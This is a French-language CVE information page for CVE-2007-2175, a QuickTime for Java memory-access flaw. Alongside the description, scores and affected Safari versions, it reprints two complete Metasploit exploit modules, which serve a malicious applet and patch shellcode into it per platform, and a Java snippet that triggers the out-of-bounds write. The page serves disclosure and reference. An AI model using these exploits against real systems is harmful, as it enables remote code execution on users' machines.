Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Apple QuickTime Java extensions (QTJava.dll), as used in Safari and other browsers, and when Java is enabled, allows remote attackers to execute arbitrary code via parameters to the toQTPointer method in quicktime.util.QTHandleRef, which can be used to modify arbitrary memory when creating QTPointerRef objects, as demonstrated during the "PWN 2 0WN" contest at CanSecWest 2007.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.6 | AV:N/AC:H/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16295
Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: qtjava_pointer.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',
'Description' => %q{
This module exploits an arbitrary memory access vulnerability in the
Quicktime for Java API provided with Quicktime 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hdm', # Original exploit for Mac OS X PPC / Win32
'kf', # Added support for Mac OS X X86
'ddz' # Discovered bug, provided tips
],
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2007-2175'],
['OSVDB', '34178'],
['BID', '23608'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-023.html'],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => ''
},
'Targets' =>
[
#
# Problem with generic payloads + regenerate_payload still :(
#
# [ 'Quicktime 7 Automatic',
# {
# 'Platform' => ['win', 'osx'],
# 'Arch' => [ARCH_X86, ARCH_PPC]
# }
# ],
[ 'Quicktime 7 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Quicktime 7 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Quicktime 7 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
# 'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 23 2007'
))
end
def exploit
# load the class data
path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
fd = File.open(path, "rb")
@class_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
end
end
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.class$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })
# Handle the payload
handler(cli)
end
def generate_html()
return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
return ''
end
else
this_target = target
end
# make a copy..
data = @class_data.dup
# 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86
idx_targ = data.index("\x03\x10\xcc\x54")
# 1024 bytes for shellcode
idx_code = data.index("\x03\x10\xf0\x54")
# Handle Mac OS X PPC
if (this_target.arch.include?(ARCH_PPC))
tp = regenerate_payload(cli, 'osx', ARCH_PPC, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x01")
end
# Handle Mac OS X x86 / Windows x86
if (this_target.arch.include?(ARCH_X86))
if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))
tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x03")
end
if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))
tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x02")
end
end
return data
end
def patch_bytecode(off, data, buff)
cnt = 0
off -= 1
while (cnt < buff.length)
cnt += 1
while (! (data[off-1] == 0x10 && data[off+1] == 0x54))
off += 1
end
data[off]=buff[cnt-1]
off += 1
end
return data
end
end
Exploit Database EDB-ID : 29884
Date de publication : 2007-04-22 22h00 +00:00
Auteur : Shane Macaulay
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/23608/info
QuickTime is prone to a vulnerability that may aid in the remote compromise of a vulnerable computer.
The issue occurs when a Java-enabled browser is used to view a malicious website. QuickTime must also be installed.
Attackers may exploit this issue to execute arbitrary code in the context of a user running the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.
This issue is exploitable through both Safari and Mozilla Firefox running on Mac OS X. Reports indicate that Firefox on Windows platforms may also be an exploit vector.
Reports also indicate that Internet Explorer 6 and 7 running on Windows XP may be an exploit vector, but that a sandboxing feature may interfere with successful exploits. Neither of these points has been confirmed.
// Initialize QT
QTSession.open();
// Get a handle to anything
byte b[] = new byte[1 /*arbitrary*/];
QTHandle h = new QTHandle(b);
// Turn the handle into a pointer object. The
// large negative value throws off bounds checking.
QTPointerRef p = h.toQTPointer(-2000000000 /*off*/, 10 /*size*/);
// Write to it.
p.copyFromArray(0 /*offset*/, b /*source*/, 0, 1 /*length*/);
Exploit Database EDB-ID : 9943
Date de publication : 2007-04-22 22h00 +00:00
Auteur : H D Moore
EDB Vérifié : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',
'Description' => %q{
This module exploits an arbitrary memory access vulnerability in the
Quicktime for Java API provided with Quicktime 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hdm', # Original exploit for Mac OS X PPC / Win32
'kf', # Added support for Mac OS X X86
'ddz' # Discovered bug, provided tips
],
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-2175'],
['OSVDB', '34178'],
['BID', '23608'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-023.html'],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => ''
},
'Targets' =>
[
#
# Problem with generic payloads + regenerate_payload still :(
#
# [ 'Quicktime 7 Automatic',
# {
# 'Platform' => ['win', 'osx'],
# 'Arch' => [ARCH_X86, ARCH_PPC]
# }
# ],
[ 'Quicktime 7 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Quicktime 7 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Quicktime 7 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
# 'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 23 2007'
))
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
end
end
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.class$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })
# Handle the payload
handler(cli)
end
def generate_html()
return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
return ''
end
else
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
fd = File.open(path, "rb")
data = fd.read
fd.close
# 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86
idx_targ = data.index("\x03\x10\xcc\x54")
# 1024 bytes for shellcode
idx_code = data.index("\x03\x10\xf0\x54")
# Handle Mac OS X PPC
if (this_target.arch.include?(ARCH_PPC))
tp = regenerate_payload(cli, 'osx', ARCH_PPC, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x01")
end
# Handle Mac OS X x86 / Windows x86
if (this_target.arch.include?(ARCH_X86))
if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))
tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x03")
end
if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))
tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x02")
end
end
return data
end
def patch_bytecode(off, data, buff)
cnt = 0
off -= 1
while (cnt < buff.length)
cnt += 1
while (! (data[off-1] == 0x10 && data[off+1] == 0x54))
off+=1
end
data[off]=buff[cnt-1]
off += 1
end
return data
end
end
Products Mentioned
Configuraton 0
Apple>>Safari >> Version *
- Apple>>Safari >> Version - (Open CPE detail)
- Apple>>Safari >> Version 1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0.0b1 (Open CPE detail)
- Apple>>Safari >> Version 1.0.0b2 (Open CPE detail)
- Apple>>Safari >> Version 1.0.1 (Open CPE detail)
- Apple>>Safari >> Version 1.0.2 (Open CPE detail)
- Apple>>Safari >> Version 1.0.3 (Open CPE detail)
- Apple>>Safari >> Version 1.0.3 (Open CPE detail)
- Apple>>Safari >> Version 1.0.3 (Open CPE detail)
- Apple>>Safari >> Version 1.0b1 (Open CPE detail)
- Apple>>Safari >> Version 1.1 (Open CPE detail)
- Apple>>Safari >> Version 1.1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.1.1 (Open CPE detail)
- Apple>>Safari >> Version 1.2 (Open CPE detail)
- Apple>>Safari >> Version 1.2.0 (Open CPE detail)
- Apple>>Safari >> Version 1.2.1 (Open CPE detail)
- Apple>>Safari >> Version 1.2.2 (Open CPE detail)
- Apple>>Safari >> Version 1.2.3 (Open CPE detail)
- Apple>>Safari >> Version 1.2.4 (Open CPE detail)
- Apple>>Safari >> Version 1.2.5 (Open CPE detail)
- Apple>>Safari >> Version 1.3 (Open CPE detail)
- Apple>>Safari >> Version 1.3.0 (Open CPE detail)
- Apple>>Safari >> Version 1.3.1 (Open CPE detail)
- Apple>>Safari >> Version 1.3.2 (Open CPE detail)
- Apple>>Safari >> Version 1.3.2 (Open CPE detail)
- Apple>>Safari >> Version 1.3.2 (Open CPE detail)
- Apple>>Safari >> Version 2 (Open CPE detail)
- Apple>>Safari >> Version 2.0 (Open CPE detail)
- Apple>>Safari >> Version 2.0.0 (Open CPE detail)
- Apple>>Safari >> Version 2.0.1 (Open CPE detail)
- Apple>>Safari >> Version 2.0.2 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.4 (Open CPE detail)
- Apple>>Safari >> Version 2.0.4 (Open CPE detail)
- Apple>>Safari >> Version 3 (Open CPE detail)
- Apple>>Safari >> Version 3.0 (Open CPE detail)
- Apple>>Safari >> Version 3.0.0 (Open CPE detail)
- Apple>>Safari >> Version 3.0.0 (Open CPE detail)
- Apple>>Safari >> Version 3.0.0b (Open CPE detail)
- Apple>>Safari >> Version 3.0.0b (Open CPE detail)
- Apple>>Safari >> Version 3.0.1 (Open CPE detail)
- Apple>>Safari >> Version 3.0.1 (Open CPE detail)
- Apple>>Safari >> Version 3.0.1 (Open CPE detail)
- Apple>>Safari >> Version 3.0.1b (Open CPE detail)
- Apple>>Safari >> Version 3.0.1b (Open CPE detail)
- Apple>>Safari >> Version 3.0.2 (Open CPE detail)
- Apple>>Safari >> Version 3.0.2 (Open CPE detail)
- Apple>>Safari >> Version 3.0.2b (Open CPE detail)
- Apple>>Safari >> Version 3.0.2b (Open CPE detail)
- Apple>>Safari >> Version 3.0.3 (Open CPE detail)
- Apple>>Safari >> Version 3.0.3 (Open CPE detail)
- Apple>>Safari >> Version 3.0.3b (Open CPE detail)
- Apple>>Safari >> Version 3.0.3b (Open CPE detail)
- Apple>>Safari >> Version 3.0.4 (Open CPE detail)
- Apple>>Safari >> Version 3.0.4 (Open CPE detail)
- Apple>>Safari >> Version 3.0.4b (Open CPE detail)
- Apple>>Safari >> Version 3.0.4b (Open CPE detail)
- Apple>>Safari >> Version 3.0.5 (Open CPE detail)
- Apple>>Safari >> Version 3.1.0 (Open CPE detail)
- Apple>>Safari >> Version 3.1.0 (Open CPE detail)
- Apple>>Safari >> Version 3.1.0b (Open CPE detail)
- Apple>>Safari >> Version 3.1.0b (Open CPE detail)
- Apple>>Safari >> Version 3.1.1 (Open CPE detail)
- Apple>>Safari >> Version 3.1.1b (Open CPE detail)
- Apple>>Safari >> Version 3.1.2 (Open CPE detail)
- Apple>>Safari >> Version 3.1.2b (Open CPE detail)
- Apple>>Safari >> Version 3.2.0 (Open CPE detail)
- Apple>>Safari >> Version 3.2.0b (Open CPE detail)
- Apple>>Safari >> Version 3.2.1 (Open CPE detail)
- Apple>>Safari >> Version 3.2.1b (Open CPE detail)
- Apple>>Safari >> Version 3.2.2 (Open CPE detail)
- Apple>>Safari >> Version 3.2.2b (Open CPE detail)
- Apple>>Safari >> Version 4.0 (Open CPE detail)
- Apple>>Safari >> Version 4.0 (Open CPE detail)
- Apple>>Safari >> Version 4.0.0b (Open CPE detail)
- Apple>>Safari >> Version 4.0.1 (Open CPE detail)
- Apple>>Safari >> Version 4.0.2 (Open CPE detail)
- Apple>>Safari >> Version 4.0.3 (Open CPE detail)
- Apple>>Safari >> Version 4.0.4 (Open CPE detail)
- Apple>>Safari >> Version 4.0.5 (Open CPE detail)
- Apple>>Safari >> Version 4.1 (Open CPE detail)
- Apple>>Safari >> Version 4.1.1 (Open CPE detail)
- Apple>>Safari >> Version 4.1.2 (Open CPE detail)
- Apple>>Safari >> Version 4.1.3 (Open CPE detail)
- Apple>>Safari >> Version 5.0 (Open CPE detail)
- Apple>>Safari >> Version 5.0.1 (Open CPE detail)
- Apple>>Safari >> Version 5.0.2 (Open CPE detail)
- Apple>>Safari >> Version 5.0.3 (Open CPE detail)
- Apple>>Safari >> Version 5.0.4 (Open CPE detail)
- Apple>>Safari >> Version 5.0.5 (Open CPE detail)
- Apple>>Safari >> Version 5.0.6 (Open CPE detail)
- Apple>>Safari >> Version 5.1 (Open CPE detail)
- Apple>>Safari >> Version 5.1.1 (Open CPE detail)
- Apple>>Safari >> Version 5.1.2 (Open CPE detail)
- Apple>>Safari >> Version 5.1.3 (Open CPE detail)
- Apple>>Safari >> Version 5.1.4 (Open CPE detail)
- Apple>>Safari >> Version 5.1.5 (Open CPE detail)
- Apple>>Safari >> Version 5.1.6 (Open CPE detail)
- Apple>>Safari >> Version 5.1.7 (Open CPE detail)
- Apple>>Safari >> Version 6.0 (Open CPE detail)
- Apple>>Safari >> Version 6.0.1 (Open CPE detail)
- Apple>>Safari >> Version 6.0.2 (Open CPE detail)
- Apple>>Safari >> Version 6.0.3 (Open CPE detail)
- Apple>>Safari >> Version 6.0.4 (Open CPE detail)
- Apple>>Safari >> Version 6.0.5 (Open CPE detail)
- Apple>>Safari >> Version 6.1 (Open CPE detail)
- Apple>>Safari >> Version 6.1.1 (Open CPE detail)
- Apple>>Safari >> Version 6.1.2 (Open CPE detail)
- Apple>>Safari >> Version 6.1.3 (Open CPE detail)
- Apple>>Safari >> Version 6.1.4 (Open CPE detail)
- Apple>>Safari >> Version 6.1.5 (Open CPE detail)
- Apple>>Safari >> Version 6.2.1 (Open CPE detail)
- Apple>>Safari >> Version 6.2.4 (Open CPE detail)
- Apple>>Safari >> Version 6.2.5 (Open CPE detail)
- Apple>>Safari >> Version 6.2.6 (Open CPE detail)
- Apple>>Safari >> Version 6.2.8 (Open CPE detail)
- Apple>>Safari >> Version 7.0 (Open CPE detail)
- Apple>>Safari >> Version 7.0.1 (Open CPE detail)
- Apple>>Safari >> Version 7.0.2 (Open CPE detail)
- Apple>>Safari >> Version 7.0.3 (Open CPE detail)
- Apple>>Safari >> Version 7.0.4 (Open CPE detail)
- Apple>>Safari >> Version 7.0.5 (Open CPE detail)
- Apple>>Safari >> Version 7.1 (Open CPE detail)
- Apple>>Safari >> Version 7.1.1 (Open CPE detail)
- Apple>>Safari >> Version 7.1.4 (Open CPE detail)
- Apple>>Safari >> Version 7.1.5 (Open CPE detail)
- Apple>>Safari >> Version 7.1.6 (Open CPE detail)
- Apple>>Safari >> Version 7.1.8 (Open CPE detail)
- Apple>>Safari >> Version 8.0 (Open CPE detail)
- Apple>>Safari >> Version 8.0.1 (Open CPE detail)
- Apple>>Safari >> Version 8.0.4 (Open CPE detail)
- Apple>>Safari >> Version 8.0.5 (Open CPE detail)
- Apple>>Safari >> Version 8.0.6 (Open CPE detail)
- Apple>>Safari >> Version 8.0.8 (Open CPE detail)
- Apple>>Safari >> Version 9.0.1 (Open CPE detail)
- Apple>>Safari >> Version 9.0.2 (Open CPE detail)
- Apple>>Safari >> Version 9.0.3 (Open CPE detail)
- Apple>>Safari >> Version 9.1 (Open CPE detail)
- Apple>>Safari >> Version 9.1.1 (Open CPE detail)
- Apple>>Safari >> Version 9.1.3 (Open CPE detail)
- Apple>>Safari >> Version 10.0.0 (Open CPE detail)
- Apple>>Safari >> Version 10.0.1 (Open CPE detail)
- Apple>>Safari >> Version 10.0.2 (Open CPE detail)
- Apple>>Safari >> Version 10.0.3 (Open CPE detail)
- Apple>>Safari >> Version 10.1 (Open CPE detail)
- Apple>>Safari >> Version 10.1.1 (Open CPE detail)
- Apple>>Safari >> Version 10.1.2 (Open CPE detail)
- Apple>>Safari >> Version 11.0 (Open CPE detail)
- Apple>>Safari >> Version 11.0.1 (Open CPE detail)
- Apple>>Safari >> Version 11.0.2 (Open CPE detail)
- Apple>>Safari >> Version 11.0.3 (Open CPE detail)
- Apple>>Safari >> Version 11.1 (Open CPE detail)
- Apple>>Safari >> Version 11.1.1 (Open CPE detail)
- Apple>>Safari >> Version 11.1.2 (Open CPE detail)
- Apple>>Safari >> Version 12 (Open CPE detail)
- Apple>>Safari >> Version 12.0 (Open CPE detail)
- Apple>>Safari >> Version 12.0.1 (Open CPE detail)
- Apple>>Safari >> Version 12.0.2 (Open CPE detail)
- Apple>>Safari >> Version 12.0.3 (Open CPE detail)
- Apple>>Safari >> Version 12.1 (Open CPE detail)
- Apple>>Safari >> Version 12.1.1 (Open CPE detail)
- Apple>>Safari >> Version 12.1.2 (Open CPE detail)
- Apple>>Safari >> Version 13 (Open CPE detail)
- Apple>>Safari >> Version 13.0.1 (Open CPE detail)
- Apple>>Safari >> Version 13.0.3 (Open CPE detail)
- Apple>>Safari >> Version 13.0.4 (Open CPE detail)
- Apple>>Safari >> Version 13.0.5 (Open CPE detail)
- Apple>>Safari >> Version 13.1 (Open CPE detail)
- Apple>>Safari >> Version 13.1.1 (Open CPE detail)
- Apple>>Safari >> Version 13.1.2 (Open CPE detail)
- Apple>>Safari >> Version 14.0 (Open CPE detail)
- Apple>>Safari >> Version 14.0.1 (Open CPE detail)
- Apple>>Safari >> Version 14.0.2 (Open CPE detail)
- Apple>>Safari >> Version 14.0.3 (Open CPE detail)
- Apple>>Safari >> Version 14.1 (Open CPE detail)
- Apple>>Safari >> Version 14.1.1 (Open CPE detail)
- Apple>>Safari >> Version 14.1.2 (Open CPE detail)
- Apple>>Safari >> Version 15.0.0 (Open CPE detail)
- Apple>>Safari >> Version 15.4 (Open CPE detail)
- Apple>>Safari >> Version 15.6 (Open CPE detail)
- Apple>>Safari >> Version 15.6.1 (Open CPE detail)
- Apple>>Safari >> Version 16.0 (Open CPE detail)
- Apple>>Safari >> Version 16.1 (Open CPE detail)
- Apple>>Safari >> Version 16.2 (Open CPE detail)
- Apple>>Safari >> Version 16.3 (Open CPE detail)
- Apple>>Safari >> Version 16.4 (Open CPE detail)
- Apple>>Safari >> Version 16.4.1 (Open CPE detail)
- Apple>>Safari >> Version 16.5 (Open CPE detail)
- Apple>>Safari >> Version 16.5.1 (Open CPE detail)
- Apple>>Safari >> Version 16.5.2 (Open CPE detail)
- Apple>>Safari >> Version 16.6 (Open CPE detail)
- Apple>>Safari >> Version 16.6.1 (Open CPE detail)
- Apple>>Safari >> Version 17.0 (Open CPE detail)
- Apple>>Safari >> Version 17.1 (Open CPE detail)
- Apple>>Safari >> Version 17.1.2 (Open CPE detail)
- Apple>>Safari >> Version 17.2 (Open CPE detail)
- Apple>>Safari >> Version 17.3 (Open CPE detail)
- Apple>>Safari >> Version 17.4 (Open CPE detail)
- Apple>>Safari >> Version 17.4.1 (Open CPE detail)
- Apple>>Safari >> Version 17.5 (Open CPE detail)
- Apple>>Safari >> Version 17.6 (Open CPE detail)
- Apple>>Safari >> Version 18 (Open CPE detail)
- Apple>>Safari >> Version 18.0 (Open CPE detail)
- Apple>>Safari >> Version 18.1 (Open CPE detail)
- Apple>>Safari >> Version 18.1.1 (Open CPE detail)
- Apple>>Safari >> Version 18.2 (Open CPE detail)
- Apple>>Safari >> Version 18.3 (Open CPE detail)
- Apple>>Safari >> Version 22 (Open CPE detail)
- Apple>>Safari >> Version 46 (Open CPE detail)
Références
http://cansecwest.com/post/2007-04-20-14:54:00.First_Mac_Hacked_Cancel_Or_Allow
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://lists.apple.com/archives/security-announce/2007/May/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.securityfocus.com/archive/1/467319/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.matasano.com/log/806/hot-off-the-matasano-sms-queue-cansec-macbook-challenge-won/
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://www.matasano.com/log/812/breaking-macbook-vuln-in-quicktime-affects-win32-apple-code/
Tags : x_refsource_MISC
Tags : x_refsource_MISC
2025©
tesweb SA
